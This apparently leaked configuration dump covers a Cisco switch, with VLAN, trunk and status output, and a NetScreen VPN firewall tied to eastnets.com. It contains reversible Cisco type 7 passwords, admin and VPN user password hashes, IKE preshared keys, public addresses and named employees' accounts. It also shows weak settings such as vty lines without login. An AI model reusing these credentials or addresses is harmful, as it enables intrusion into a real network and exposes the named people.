+ switchport access vlan 219
+ switchport mode access
+!
+interface GigabitEthernet0/22
+!
+interface GigabitEthernet0/23
+ switchport mode trunk
+!
+interface GigabitEthernet0/24
+ switchport mode trunk
+!
+interface Vlan1
+ ip address 192.168.202.242 255.255.255.0
+ no ip route-cache
+!
+ip default-gateway 192.168.202.1
+ip http server
+!
+control-plane
+!
+!
+line con 0
+ password 7 047B5A03016F7F6C271C11001D1907550A
+ login
+line vty 0 4
+ password 7 03240A0E0841126E600C0D121800005D24
+ login
+line vty 5 15
+ password 7 15325A090A641806063621351C151D5221
+ no login
+!
+end
+
+ENSBPSW2#
+
+
+
+
+ENSBPSW2#show vtp status
+VTP Version                     : 2
+Configuration Revision          : 6
+Maximum VLANs supported locally : 255
+Number of existing VLANs        : 11
+VTP Operating Mode              : Client
+VTP Domain Name                 : ENSBP
+VTP Pruning Mode                : Disabled
+VTP V2 Mode                     : Disabled
+VTP Traps Generation            : Disabled
+MD5 digest                      : 0x61 0xC7 0x6F 0x53 0xF6 0x7B 0x43 0x6B
+Configuration last modified by 192.168.202.241 at 7-10-93 19:00:20
+ENSBPSW2#
+
+
+ENSBPSW2#show vlan
+
+VLAN Name                             Status    Ports
+---- -------------------------------- --------- -------------------------------
+1    default                          active    Gi0/1, Gi0/2, Gi0/3, Gi0/22
+2    swift                            active    Gi0/8, Gi0/9, Gi0/10
+3    sag                              active
+4    vpinin                           active    Gi0/4, Gi0/5, Gi0/6, Gi0/7
+5    outside                          active    Gi0/15, Gi0/16, Gi0/17, Gi0/18
+                                                Gi0/19
+7    dialin                           active    Gi0/11, Gi0/12, Gi0/13, Gi0/14
+219  DMZ                              active    Gi0/20, Gi0/21
+1002 fddi-default                     act/unsup
+1003 token-ring-default               act/unsup
+1004 fddinet-default                  act/unsup
+1005 trnet-default                    act/unsup
+
+VLAN Type  SAID       MTU   Parent RingNo BridgeNo Stp  BrdgMode Trans1 Trans2
+---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------
+1    enet  100001     1500  -      -      -        -    -        0      0
+2    enet  100002     1500  -      -      -        -    -        0      0
+3    enet  100003     1500  -      -      -        -    -        0      0
+4    enet  100004     1500  -      -      -        -    -        0      0
+5    enet  100005     1500  -      -      -        -    -        0      0
+7    enet  100007     1500  -      -      -        -    -        0      0
+
+VLAN Type  SAID       MTU   Parent RingNo BridgeNo Stp  BrdgMode Trans1 Trans2
+---- ----- ---------- ----- ------ ------ -------- ---- -------- ------ ------
+219  enet  100219     1500  -      -      -        -    -        0      0
+1002 fddi  101002     1500  -      -      -        -    -        0      0
+1003 tr    101003     1500  -      -      -        -    srb      0      0
+1004 fdnet 101004     1500  -      -      -        ieee -        0      0
+1005 trnet 101005     1500  -      -      -        ibm  -        0      0
+
+Remote SPAN VLANs
+------------------------------------------------------------------------------
+
+
+Primary Secondary Type              Ports
+------- --------- ----------------- ------------------------------------------
+
+ENSBPSW2#
+
+
+
+ENSBPSW2#show int trunk
+
+Port        Mode         Encapsulation  Status        Native vlan
+Gi0/23      on           802.1q         trunking      1
+Gi0/24      on           802.1q         trunking      1
+
+Port        Vlans allowed on trunk
+Gi0/23      1-4094
+Gi0/24      1-4094
+
+Port        Vlans allowed and active in management domain
+Gi0/23      1-5,7,219
+Gi0/24      1-5,7,219
+
+Port        Vlans in spanning tree forwarding state and not pruned
+Gi0/23      1-5,7,219
+Gi0/24      none
+ENSBPSW2#
+
+
+ENSBPSW2#show int status
+
+Port      Name               Status       Vlan       Duplex  Speed Type
+Gi0/1                        connected    1          a-full a-1000 10/100/1000Ba
+seTX
+Gi0/2                        connected    1          a-full  a-100 10/100/1000Ba
+seTX
+Gi0/3                        connected    1          a-full  a-100 10/100/1000Ba
+seTX
+Gi0/4                        connected    4          a-full a-1000 10/100/1000Ba
+seTX
+Gi0/5                        connected    4          a-full  a-100 10/100/1000Ba
+seTX
+Gi0/6                        connected    4          a-full  a-100 10/100/1000Ba
+seTX
+Gi0/7                        notconnect   4            auto   auto 10/100/1000Ba
+seTX
+Gi0/8                        connected    2          a-full  a-100 10/100/1000Ba
+seTX
+Gi0/9                        connected    2          a-full  a-100 10/100/1000Ba
+seTX
+Gi0/10                       notconnect   2            auto   auto 10/100/1000Ba
+seTX
+Gi0/11                       connected    7          a-full a-1000 10/100/1000Ba
+seTX
+
+Port      Name               Status       Vlan       Duplex  Speed Type
+Gi0/12                       connected    7          a-full  a-100 10/100/1000Ba
+seTX
+Gi0/13                       connected    7          a-full a-1000 10/100/1000Ba
+seTX
+Gi0/14                       notconnect   7            auto   auto 10/100/1000Ba
+seTX
+Gi0/15                       connected    5          a-full a-1000 10/100/1000Ba
+seTX
+Gi0/16                       notconnect   5            auto   auto 10/100/1000Ba
+seTX
+Gi0/17                       notconnect   5            auto   auto 10/100/1000Ba
+seTX
+Gi0/18                       notconnect   5            auto   auto 10/100/1000Ba
+seTX
+Gi0/19                       notconnect   5            auto   auto 10/100/1000Ba
+seTX
+Gi0/20                       connected    219        a-full  a-100 10/100/1000Ba
+seTX
+Gi0/21                       connected    219        a-full a-1000 10/100/1000Ba
+seTX
+Gi0/22                       notconnect   1            auto   auto Not Present
+Gi0/23                       connected    trunk      a-full a-1000 10/100/1000Ba
+seTX
+Gi0/24                       connected    trunk      a-full a-1000 10/100/1000Ba
+seTX
+ENSBPSW2#
+
+

swift/00705_0_254.229-2013sep06.txt

@@ -0,0 +1,622 @@
+unset key protection enable
+set clock dst-off
+set clock timezone 4
+set clock dst recurring start-weekday 2 0 3 02:00 end-weekday 1 0 11 02:00
+set vrouter trust-vr sharable
+set vrouter "untrust-vr"
+exit
+set vrouter "trust-vr"
+unset auto-route-export
+exit
+set service "SQL" protocol tcp src-port 0-65535 dst-port 1433-1433 
+set service "MPARK WEB" protocol tcp src-port 0-65535 dst-port 8081-8081 
+set service "Comtrust" protocol tcp src-port 0-65535 dst-port 2443-2443 
+set service "CVS-WEB" protocol tcp src-port 0-65535 dst-port 8082-8082 
+set service "TCP8083" protocol tcp src-port 0-65535 dst-port 8083-8083 
+set service "TCP_8095" protocol tcp src-port 0-65535 dst-port 8095-8095 
+set service "HP-OA-1443" protocol tcp src-port 0-65535 dst-port 1443-1443 
+set service "HTTP-8080" protocol tcp src-port 0-65535 dst-port 8080-8080 
+set service "SW-TCP-8401" protocol tcp src-port 0-65535 dst-port 8401-8401 
+set service "SW-UDP-8400" protocol udp src-port 0-65535 dst-port 8400-8400 
+set service "RDP" protocol tcp src-port 0-65535 dst-port 3389-3389 
+set alg appleichat enable
+unset alg appleichat re-assembly enable
+set alg sctp enable
+set auth-server "Local" id 0
+set auth-server "Local" server-name "Local"
+set auth default auth server "Local"
+set auth radius accounting port 1646
+set admin name "ENSBadmin"
+set admin password "nBd5PIrLLusBciHPhs0PBnMtk5Dm5n"
+set admin user "kbaluyot" password "nMSQP4rHLyxHcWqBmsqP9pMtnMGPYn" privilege "all"
+set admin user "msaeed" password "nF3dKrrkHDHCckxALsfARkBtenLoAn" privilege "all"
+set admin user "juy" password "nGB6DqrpKxQAc4pI/sxHVLIt1aEskn" privilege "all"
+set admin user "adesear" password "nLtbNIrRDSPEcrMDFs7MT5Htz8Cifn" privilege "all"
+set admin port 8080
+set admin ssh port 2194
+set admin http redirect
+set admin auth web timeout 10
+set admin auth server "Local"
+set admin format dos
+set zone "Trust" vrouter "trust-vr"
+set zone "Untrust" vrouter "trust-vr"
+set zone "DMZ" vrouter "trust-vr"
+set zone "VLAN" vrouter "trust-vr"
+set zone id 100 "MPLS"
+set zone id 101 "APN"
+set zone id 102 "MGMT"
+set zone "Untrust-Tun" vrouter "trust-vr"
+set zone "Trust" tcp-rst 
+set zone "Untrust" block 
+unset zone "Untrust" tcp-rst 
+set zone "MGT" block 
+unset zone "V1-Trust" tcp-rst 
+unset zone "V1-Untrust" tcp-rst 
+set zone "DMZ" tcp-rst 
+unset zone "V1-DMZ" tcp-rst 
+unset zone "VLAN" tcp-rst 
+set zone "MPLS" tcp-rst 
+set zone "APN" tcp-rst 
+set zone "MGMT" tcp-rst 
+set zone "Untrust" screen tear-drop
+set zone "Untrust" screen syn-flood
+set zone "Untrust" screen ping-death
+set zone "Untrust" screen ip-filter-src
+set zone "Untrust" screen land
+set zone "V1-Untrust" screen tear-drop
+set zone "V1-Untrust" screen syn-flood
+set zone "V1-Untrust" screen ping-death
+set zone "V1-Untrust" screen ip-filter-src
+set zone "V1-Untrust" screen land
+set interface "ethernet0/0" zone "Trust"
+set interface "ethernet0/1" zone "Untrust"
+set interface "ethernet0/2" zone "MGMT"
+set interface "ethernet3/0" zone "Untrust"
+set interface "tunnel.18" zone "Untrust"
+set interface ethernet0/0 ip 192.168.120.4/24
+set interface ethernet0/0 nat
+unset interface vlan1 ip
+set interface ethernet0/1 ip 80.227.254.228/27
+set interface ethernet0/1 route
+set interface ethernet0/2 ip 192.168.153.1/24
+set interface ethernet0/2 route
+set interface ethernet3/0 ip 80.227.254.196/27
+set interface ethernet3/0 route
+set interface tunnel.18 ip unnumbered interface ethernet0/1
+set interface tunnel.18 mtu 1500
+unset interface vlan1 bypass-others-ipsec
+unset interface vlan1 bypass-non-ip
+set interface ethernet0/0 manage-ip 192.168.120.5
+set interface ethernet0/1 manage-ip 80.227.254.229
+set interface ethernet3/0 manage-ip 80.227.254.197
+unset interface ethernet0/0 ip manageable
+unset interface ethernet0/1 ip manageable
+set interface ethernet0/2 ip manageable
+unset interface ethernet3/0 ip manageable
+set interface ethernet0/1 manage ping
+set interface ethernet0/1 manage ssh
+set interface ethernet0/1 manage ssl
+set interface ethernet0/2 manage ping
+set interface ethernet0/2 manage ssh
+set interface ethernet0/2 manage telnet
+set interface ethernet0/2 manage snmp
+set interface ethernet0/2 manage ssl
+set interface ethernet0/2 manage web
+set interface ethernet3/0 manage ping
+set interface ethernet3/0 manage ssh
+set interface ethernet3/0 manage ssl
+set interface ethernet0/1 vip 80.227.254.232 1443 "HTTPS" 192.168.153.10 manual
+set interface ethernet0/1 vip 80.227.254.232 + 443 "HTTPS" 192.168.120.51 manual
+unset flow no-tcp-seq-check
+set flow tcp-syn-check
+unset flow tcp-syn-bit-check
+set flow reverse-route clear-text prefer
+set flow reverse-route tunnel always
+set console page 10
+set hostname ENSBDVPNSW1
+set pki authority default scep mode "auto"
+set pki x509 default cert-path partial
+set nsrp cluster id 1
+set nsrp rto-mirror sync
+set nsrp rto-mirror route
+set nsrp rto-mirror session ageout-ack
+set nsrp rto-mirror session non-vsi
+set nsrp vsd-group id 0 priority 50
+set nsrp vsd-group id 0 preempt
+set nsrp monitor interface ethernet0/0
+set nsrp monitor interface ethernet0/1
+set nsrp monitor interface ethernet3/0
+set dns host dns1 80.227.2.4 src-interface ethernet0/1
+set dns host dns2 80.227.2.3 src-interface ethernet0/1
+set dns host dns3 0.0.0.0
+set address "Trust" "ENSBDSW-NW" 192.168.120.0 255.255.255.0
+set address "Trust" "ENSBDSW1" 192.168.120.51 255.255.255.255
+set address "Trust" "ENSBDSW2" 192.168.120.52 255.255.255.255
+set address "Trust" "ENSWDUAT-SRV1" 192.168.120.200 255.255.255.255
+set address "Untrust" "213.132.40.96/29" 213.132.40.96 255.255.255.248
+set address "Untrust" "80.227.152.131/32" 80.227.152.131 255.255.255.255
+set address "Untrust" "ENIT-Server01" 192.168.3.101 255.255.255.255
+set address "Untrust" "TELEPIN-FTP" 202.40.237.153 255.255.255.255
+set address "Untrust" "TELEPIN-SINGTEL-SRV1" 202.40.237.146 255.255.255.255
+set address "Untrust" "TELEPIN-SINGTEL-SRV2" 202.40.237.147 255.255.255.255
+set address "Untrust" "TELEPIN-SINGTEL-SRV3" 202.40.237.148 255.255.255.255
+set address "Untrust" "TELEPIN-SINGTEL-SRV4" 202.40.237.145 255.255.255.255
+set address "MPLS" "CARP1" 10.160.6.0 255.255.255.0
+set address "MPLS" "CLLC1" 10.160.14.0 255.255.255.0
+set address "MPLS" "CTRC1" 10.160.15.0 255.255.255.0
+set address "MPLS" "DOT1" 10.160.1.0 255.255.255.0
+set address "MPLS" "DPLY1" 10.160.2.0 255.255.255.0
+set address "MPLS" "DPLY2" 10.160.3.0 255.255.255.0
+set address "MPLS" "DPLY3" 10.160.4.0 255.255.255.0
+set address "MPLS" "DPLY4" 10.160.5.0 255.255.255.0
+set address "MPLS" "MPARK1" 10.160.14.0 255.255.255.0
+set address "MPLS" "PDM1" 10.160.13.0 255.255.255.0
+set address "MPLS" "PDM2" 10.160.14.0 255.255.255.0
+set address "MPLS" "POF1" 10.160.12.0 255.255.255.0
+set address "MPLS" "PSHP1" 10.160.7.0 255.255.255.0
+set address "MPLS" "PSHP2" 10.160.8.0 255.255.255.0
+set address "MPLS" "PSHP3" 10.160.9.0 255.255.255.0
+set address "MPLS" "PSHP4" 10.160.10.0 255.255.255.0
+set address "MPLS" "PSHP5" 10.160.11.0 255.255.255.0
+set address "MGMT" "HP-OA" 192.168.153.10 255.255.255.255
+set address "MGMT" "MGMT-NW" 192.168.153.0 255.255.255.0
+set group address "Trust" "ENSBDSW-SRV-GRP"
+set group address "Trust" "ENSBDSW-SRV-GRP" add "ENSBDSW1"
+set group address "Trust" "ENSBDSW-SRV-GRP" add "ENSBDSW2"
+set group address "Untrust" "TELEPIN-SRVS"
+set group address "Untrust" "TELEPIN-SRVS" add "TELEPIN-FTP"
+set group address "Untrust" "TELEPIN-SRVS" add "TELEPIN-SINGTEL-SRV1"
+set group address "Untrust" "TELEPIN-SRVS" add "TELEPIN-SINGTEL-SRV2"
+set group address "Untrust" "TELEPIN-SRVS" add "TELEPIN-SINGTEL-SRV3"
+set group address "Untrust" "TELEPIN-SRVS" add "TELEPIN-SINGTEL-SRV4"
+set group service "SINGTEL-USER-PORTS"
+set group service "SINGTEL-USER-PORTS" add "HTTP-8080"
+set group service "SINGTEL-USER-PORTS" add "HTTPS"
+set group service "SINGTEL-USER-PORTS" add "ICMP-ANY"
+set group service "SINGTEL-USER-PORTS" add "SSH"
+set group service "SINGTEL-USER-PORTS" add "SW-TCP-8401"
+set group service "SINGTEL-USER-PORTS" add "SW-UDP-8400"
+set group service "SWAAS-SUPPORT-PORTS"
+set group service "SWAAS-SUPPORT-PORTS" add "RDP"
+set group service "SWAAS-SUPPORT-PORTS" add "SW-TCP-8401"
+set group service "SWAAS-SUPPORT-PORTS" add "SW-UDP-8400"
+set group service "SWAAS-SUPPORT-PORTS" add "SINGTEL-USER-PORTS"
+set group service "TEST"
+set group service "TEST" add "HTTPS"
+set group service "TEST" add "SMTP"
+set group service "TEST" add "SSH"
+set ippool "MGMT-Pool" 10.161.0.1 10.161.0.20
+set ippool "APP-POOL" 10.162.0.1 10.162.0.20
+set ippool "Singtel-Users" 10.159.9.130 10.159.9.135
+set ippool "Singtel-Support" 10.159.9.136 10.159.9.140
+set ippool "Singtel-Users1" 10.159.9.141 10.159.9.150
+set ippool "DEV-POOL" 10.162.0.21 10.162.0.40
+set user "AAbuhijleh" uid 45
+set user "AAbuhijleh" ike-id u-fqdn "AAbuhijleh@eastnets.com" share-limit 1
+set user "AAbuhijleh" type ike xauth
+set user "AAbuhijleh" remote ippool "Singtel-Support"
+set user "AAbuhijleh" password "MrItc2baN/Kwpnsx8PCxM+cfVjncCo3k6A=="
+unset user "AAbuhijleh" type auth
+set user "AAbuhijleh" "enable"
+set user "ABader" uid 28
+set user "ABader" ike-id u-fqdn "ABader@eastnets.com" share-limit 1
+set user "ABader" type ike xauth
+set user "ABader" remote ippool "DEV-POOL"
+set user "ABader" password "zWmfh2+sNNS3sNst+2CZj7CSr3nI7GspqQ=="
+unset user "ABader" type auth
+set user "ABader" "enable"
+set user "AHiari" uid 31
+set user "AHiari" ike-id u-fqdn "AHiari@eastnets.com" share-limit 1
+set user "AHiari" type ike xauth
+set user "AHiari" remote ippool "DEV-POOL"
+set user "AHiari" password "1VzpEt9gNlQnkksKbtCeXbJmJenLu+imgg=="
+unset user "AHiari" type auth
+set user "AHiari" "enable"
+set user "EYounes" uid 30
+set user "EYounes" ike-id u-fqdn "EYounes@eastnets.com" share-limit 1
+set user "EYounes" type ike xauth
+set user "EYounes" remote ippool "DEV-POOL"
+set user "EYounes" password "aA/osaPtNdn6OXscYwCUW2CRLhnjy4atwA=="
+unset user "EYounes" type auth
+set user "EYounes" "enable"
+set user "FTawaha" uid 48
+set user "FTawaha" ike-id u-fqdn "FTawaha@eastnets.com" share-limit 1
+set user "FTawaha" type ike xauth
+set user "FTawaha" remote ippool "Singtel-Support"
+set user "FTawaha" password "q1vUxrL3N50sJGsg1bCAHnYzp8nKSNfsgw=="
+unset user "FTawaha" type auth
+set user "FTawaha" "enable"
+set user "MAQatanany" uid 47
+set user "MAQatanany" ike-id u-fqdn "MAQatanany@eastnets.com" share-limit 1
+set user "MAQatanany" type ike xauth
+set user "MAQatanany" remote ippool "Singtel-Support"
+set user "MAQatanany" password "53iey8k1NoHdYnsbYlC0Mtj4VenQ8LXspg=="
+unset user "MAQatanany" type auth
+set user "MAQatanany" "enable"
+set user "SJaber" uid 29
+set user "SJaber" ike-id u-fqdn "SJaber@eastnets.com" share-limit 1
+set user "SJaber" type ike xauth
+set user "SJaber" remote ippool "DEV-POOL"
+set user "SJaber" password "N4S9rNhQNJgVxJsj30CVJqyjBzn8rpFN1Q=="
+unset user "SJaber" type auth
+set user "SJaber" "enable"
+set user "SQasim" uid 46
+set user "SQasim" ike-id u-fqdn "SQasim@eastnets.com" share-limit 1
+set user "SQasim" type ike xauth
+set user "SQasim" remote ippool "Singtel-Support"
+set user "SQasim" password "rle870YUNIHHJrsJwbCV2kDh+VnHE64TXw=="
+unset user "SQasim" type auth
+set user "SQasim" "enable"
+set user "SW-AEdwan" uid 49
+set user "SW-AEdwan" ike-id u-fqdn "SW-AEdwan@eastnets.com" share-limit 1
+set user "SW-AEdwan" type ike xauth
+set user "SW-AEdwan" remote ippool "Singtel-Support"
+set user "SW-AEdwan" password "AuaXPsV7NihRntsLURCD1saUPCnkTJShbQ=="
+unset user "SW-AEdwan" type auth
+set user "SW-AEdwan" "enable"
+set user "Singtel1" uid 40
+set user "Singtel1" ike-id u-fqdn "Singtel1@eastnets.com" share-limit 1
+set user "Singtel1" type ike xauth
+set user "Singtel1" remote ippool "Singtel-Users"
+set user "Singtel1" password "GCZKD2qSNxYECwsVawCqPEAkpInN9pWh2w=="
+unset user "Singtel1" type auth
+set user "Singtel1" "enable"
+set user "Singtel11" uid 51
+set user "Singtel11" ike-id u-fqdn "Singtel11@eastnets.com" share-limit 1
+set user "Singtel11" type ike xauth
+set user "Singtel11" remote ippool "Singtel-Users1"
+set user "Singtel11" password "F87E/Du2NcNjMCsIVCC+l6YJcEnR2PmmsQ=="
+unset user "Singtel11" type auth
+set user "Singtel11" "enable"
+set user "Singtel12" uid 52
+set user "Singtel12" ike-id u-fqdn "Singtel12@eastnets.com" share-limit 1
+set user "Singtel12" type ike xauth
+set user "Singtel12" remote ippool "Singtel-Users1"
+set user "Singtel12" password "kEXo5+/VNJaSz5s0SyC8afP5Spn9KMiTcg=="
+unset user "Singtel12" type auth
+set user "Singtel12" "enable"
+set user "Singtel13" uid 53
+set user "Singtel13" ike-id u-fqdn "Singtel13@eastnets.com" share-limit 1
+set user "Singtel13" type ike xauth
+set user "Singtel13" remote ippool "Singtel-Users1"
+set user "Singtel13" password "RbXNRHfhNsEkkKsrLQCimfSeP3nfLjg9hA=="
+unset user "Singtel13" type auth
+set user "Singtel13" "enable"
+set user "Singtel14" uid 54
+set user "Singtel14" ike-id u-fqdn "Singtel14@eastnets.com" share-limit 1
+set user "Singtel14" type ike xauth
+set user "Singtel14" remote ippool "Singtel-Users1"
+set user "Singtel14" password "fELIIrMfNlj103s+0cCidhbDiFnRkX4x0Q=="
+unset user "Singtel14" type auth
+set user "Singtel14" "enable"
+set user "Singtel15" uid 55
+set user "Singtel15" ike-id u-fqdn "Singtel15@eastnets.com" share-limit 1
+set user "Singtel15" type ike xauth
+set user "Singtel15" remote ippool "Singtel-Users1"
+set user "Singtel15" password "sjEWUX1zNM9daossRNCvkjfcU1nVXNj42A=="
+unset user "Singtel15" type auth
+set user "Singtel15" "enable"
+set user "Singtel16" uid 56
+set user "Singtel16" ike-id u-fqdn "Singtel16@eastnets.com" share-limit 1
+set user "Singtel16" type ike xauth
+set user "Singtel16" remote ippool "Singtel-Users1"
+set user "Singtel16" password "iwE8ZznrNOaGxdsuGoCyW1w4F6noaMHyVA=="
+unset user "Singtel16" type auth
+set user "Singtel16" "enable"
+set user "Singtel17" uid 57
+set user "Singtel17" ike-id u-fqdn "Singtel17@eastnets.com" share-limit 1
+set user "Singtel17" type ike xauth
+set user "Singtel17" remote ippool "Singtel-Users1"
+set user "Singtel17" password "Cs7DN2iqNqr5SVs23SCM8I57LOnNTeeQ4A=="
+unset user "Singtel17" type auth
+set user "Singtel17" "enable"
+set user "Singtel2" uid 41
+set user "Singtel2" ike-id u-fqdn "Singtel2@eastnets.com" share-limit 1
+set user "Singtel2" type ike xauth
+set user "Singtel2" remote ippool "Singtel-Users"
+set user "Singtel2" password "U4HXRk2ONPTaNSszLlCSrK78Zon+NBgu2Q=="
+unset user "Singtel2" type auth
+set user "Singtel2" "enable"
+set user "Singtel3" uid 42
+set user "Singtel3" ike-id u-fqdn "Singtel3@eastnets.com" share-limit 1
+set user "Singtel3" type ike xauth
+set user "Singtel3" remote ippool "Singtel-Users"
+set user "Singtel3" password "0rAzjVglN4/52ssHJSCaCPHsUHn71QpZJA=="
+unset user "Singtel3" type auth
+set user "Singtel3" "enable"
+set user "Singtel4" uid 43
+set user "Singtel4" ike-id u-fqdn "Singtel4@eastnets.com" share-limit 1
+set user "Singtel4" type ike xauth
+set user "Singtel4" remote ippool "Singtel-Users"
+set user "Singtel4" password "A2QlRqtMNzTFmSs87zCnhEIxAQnvKlGegA=="
+unset user "Singtel4" type auth
+set user "Singtel4" "enable"
+set user "Singtel5" uid 44
+set user "Singtel5" ike-id u-fqdn "Singtel5@eastnets.com" share-limit 1
+set user "Singtel5" type ike xauth
+set user "Singtel5" remote ippool "Singtel-Users"
+set user "Singtel5" password "6mztaDz8Nifn+dsX9GCVq19nHHnnmZazJQ=="
+unset user "Singtel5" type auth
+set user "Singtel5" "enable"
+set user "adesear" uid 9
+set user "adesear" ike-id u-fqdn "adesear@eastnets.com" share-limit 1
+set user "adesear" type ike xauth
+set user "adesear" remote ippool "MGMT-Pool"
+set user "adesear" password "Rw4kEbtQNM801Qsn/OCqLj5ysYn6oX10Tg=="
+unset user "adesear" type auth
+set user "adesear" "enable"
+set user "aedwan" uid 133
+set user "aedwan" ike-id u-fqdn "aedwan@eastnets.com" share-limit 1
+set user "aedwan" type ike xauth
+set user "aedwan" remote ippool "APP-POOL"
+set user "aedwan" password "cpmVyDSkNilN4nsUpSCTe+iJ/UnY/ErbNw=="
+unset user "aedwan" type auth
+set user "aedwan" "enable"
+set user "ahamsa" uid 22
+set user "ahamsa" ike-id u-fqdn "ahamsa@eastnets.com" share-limit 1
+set user "ahamsa" type ike xauth
+set user "ahamsa" remote ippool "MGMT-Pool"
+set user "ahamsa" password "e5ahpYssNxE5cfsgVqCdCeAAxQnjZm1ZuA=="
+unset user "ahamsa" type auth
+set user "ahamsa" "enable"
+set user "juy" uid 8
+set user "juy" ike-id u-fqdn "juy@eastnets.com" share-limit 1
+set user "juy" type ike xauth
+set user "juy" remote ippool "MGMT-Pool"
+set user "juy" password "sSf6pikENM7pSdspNHC8oogQNunZjMe6Fg=="
+unset user "juy" type auth
+set user "juy" "enable"
+set user "kbaluyot" uid 1
+set user "kbaluyot" ike-id u-fqdn "kbaluyot@eastnets.com" share-limit 1
+set user "kbaluyot" type ike xauth
+set user "kbaluyot" remote ippool "MGMT-Pool"
+set user "kbaluyot" password "KIh0kFJANx9C01sHOYC5qOwrMInqxp6XFg=="
+unset user "kbaluyot" type auth
+set user "kbaluyot" "enable"
+set user "mqasas" uid 136
+set user "mqasas" ike-id u-fqdn "mqasas@eastnets.com" share-limit 1
+set user "mqasas" type ike xauth
+set user "mqasas" remote ippool "APP-POOL"
+set user "mqasas" password "R3dJjIEqN3+HjaseWmCGzqmRrSnDqJ+ueA=="
+unset user "mqasas" type auth
+set user "mqasas" "enable"
+set user "msaeed" uid 7
+set user "msaeed" ike-id u-fqdn "msaeed@eastnets.com" share-limit 1
+set user "msaeed" type ike xauth
+set user "msaeed" remote ippool "MGMT-Pool"
+set user "msaeed" password "kJTa0uZBN7hcHAs5xsCbNzHLosncJxOFoA=="
+unset user "msaeed" type auth
+set user "msaeed" "enable"
+set user "msalameh" uid 135
+set user "msalameh" ike-id u-fqdn "msalameh@eastnets.com" share-limit 1
+set user "msalameh" type ike xauth
+set user "msalameh" remote ippool "APP-POOL"
+set user "msalameh" password "+bNOw9gUNOFc/Csgk4CpRW2Dv8nzzRMYhA=="
+unset user "msalameh" type auth
+set user "msalameh" "enable"
+set user "sqasim" uid 134
+set user "sqasim" ike-id u-fqdn "sqasim@eastnets.com" share-limit 1
+set user "sqasim" type ike xauth
+set user "sqasim" remote ippool "APP-POOL"
+set user "sqasim" password "pzwLLrRwNT6mtasSXiCqydGOyNn72MIM0g=="
+unset user "sqasim" type auth
+set user "sqasim" "enable"
+set user-group "APP-DIALIN" id 7
+set user-group "APP-DIALIN" user "aedwan"
+set user-group "APP-DIALIN" user "mqasas"
+set user-group "APP-DIALIN" user "msalameh"
+set user-group "APP-DIALIN" user "sqasim"
+set user-group "DEV-DIALIN" id 6
+set user-group "DEV-DIALIN" user "ABader"
+set user-group "DEV-DIALIN" user "AHiari"
+set user-group "DEV-DIALIN" user "EYounes"
+set user-group "DEV-DIALIN" user "SJaber"
+set user-group "MGMT-DIALIN" id 1
+set user-group "MGMT-DIALIN" user "adesear"
+set user-group "MGMT-DIALIN" user "ahamsa"
+set user-group "MGMT-DIALIN" user "juy"
+set user-group "MGMT-DIALIN" user "kbaluyot"
+set user-group "MGMT-DIALIN" user "msaeed"
+set user-group "Singtel-Support" id 17
+set user-group "Singtel-Support" user "AAbuhijleh"
+set user-group "Singtel-Support" user "FTawaha"
+set user-group "Singtel-Support" user "MAQatanany"
+set user-group "Singtel-Support" user "SQasim"
+set user-group "Singtel-Support" user "SW-AEdwan"
+set user-group "Singtel-Users" id 5
+set user-group "Singtel-Users" user "Singtel1"
+set user-group "Singtel-Users" user "Singtel11"
+set user-group "Singtel-Users" user "Singtel12"
+set user-group "Singtel-Users" user "Singtel13"
+set user-group "Singtel-Users" user "Singtel14"
+set user-group "Singtel-Users" user "Singtel15"
+set user-group "Singtel-Users" user "Singtel16"
+set user-group "Singtel-Users" user "Singtel17"
+set user-group "Singtel-Users" user "Singtel2"
+set user-group "Singtel-Users" user "Singtel3"
+set user-group "Singtel-Users" user "Singtel4"
+set user-group "Singtel-Users" user "Singtel5"
+set crypto-policy
+exit
+set ike gateway "MGMT-DIALIN" dialup "MGMT-DIALIN" Aggr outgoing-interface "ethernet0/1" preshare "ByXkE/bmN0eY0AsGJHC/EdzhArnVqWCbiA==" proposal "pre-g2-3des-sha"
+set ike gateway "MGMT-DIALIN" nat-traversal udp-checksum
+set ike gateway "MGMT-DIALIN" nat-traversal keepalive-frequency 5
+set ike gateway "MGMT-DIALIN" xauth
+unset ike gateway "MGMT-DIALIN" xauth do-edipi-auth
+set ike gateway "APP-DIALIN" dialup "APP-DIALIN" Aggr outgoing-interface "ethernet0/1" preshare "0PZy3hhmNAxQGBs4oACh5o1bk2nloDpcJg==" proposal "pre-g2-3des-sha"
+set ike gateway "APP-DIALIN" nat-traversal udp-checksum
+set ike gateway "APP-DIALIN" nat-traversal keepalive-frequency 5
+set ike gateway "APP-DIALIN" xauth
+unset ike gateway "APP-DIALIN" xauth do-edipi-auth
+set ike gateway "Singtel-Users-Dialup" dialup "Singtel-Users" Aggr outgoing-interface "ethernet0/1" preshare "p830vKV7NEafXes1JRCHZDAYDen2Kf7Z5AxIfkdwbkjYgRkQKjiheuI=" proposal "pre-g2-3des-sha"
+set ike gateway "Singtel-Users-Dialup" nat-traversal udp-checksum
+set ike gateway "Singtel-Users-Dialup" nat-traversal keepalive-frequency 0
+set ike gateway "Singtel-Users-Dialup" xauth
+unset ike gateway "Singtel-Users-Dialup" xauth do-edipi-auth
+set ike gateway "Singtel-Support-Dialup" dialup "Singtel-Support" Aggr outgoing-interface "ethernet0/1" preshare "//nOG9ajNcF2FgsMOGC7DyElpCn6nKe4uj46xqVxUZq3UDv8C92rb2g=" proposal "pre-g2-3des-sha"
+set ike gateway "Singtel-Support-Dialup" nat-traversal udp-checksum
+set ike gateway "Singtel-Support-Dialup" nat-traversal keepalive-frequency 5
+set ike gateway "Singtel-Support-Dialup" xauth
+unset ike gateway "Singtel-Support-Dialup" xauth do-edipi-auth
+set ike gateway "test" address 10.10.10.10 Main outgoing-interface "ethernet0/1" preshare "23USbi74NkLqdbs5sGCXgBJ9Cfnnx5z++Q==" proposal "pre-g2-3des-sha"
+set ike gateway "test" nat-traversal
+set ike gateway "test" nat-traversal udp-checksum
+set ike gateway "test" nat-traversal keepalive-frequency 5
+set ike gateway "ENSB-TELEPIN-UAT-LL" address 202.40.237.158 Main outgoing-interface "ethernet0/1" preshare "Xj3hVg+xNCWloQsP/GCxAcLZDhnvQiCOLKcM63cQa2+I1oiVMNo4mNc=" proposal "pre-g2-3des-sha"
+set ike gateway "ENSB-TELEPIN-UAT-LL" nat-traversal
+set ike gateway "ENSB-TELEPIN-UAT-LL" nat-traversal udp-checksum
+set ike gateway "ENSB-TELEPIN-UAT-LL" nat-traversal keepalive-frequency 5
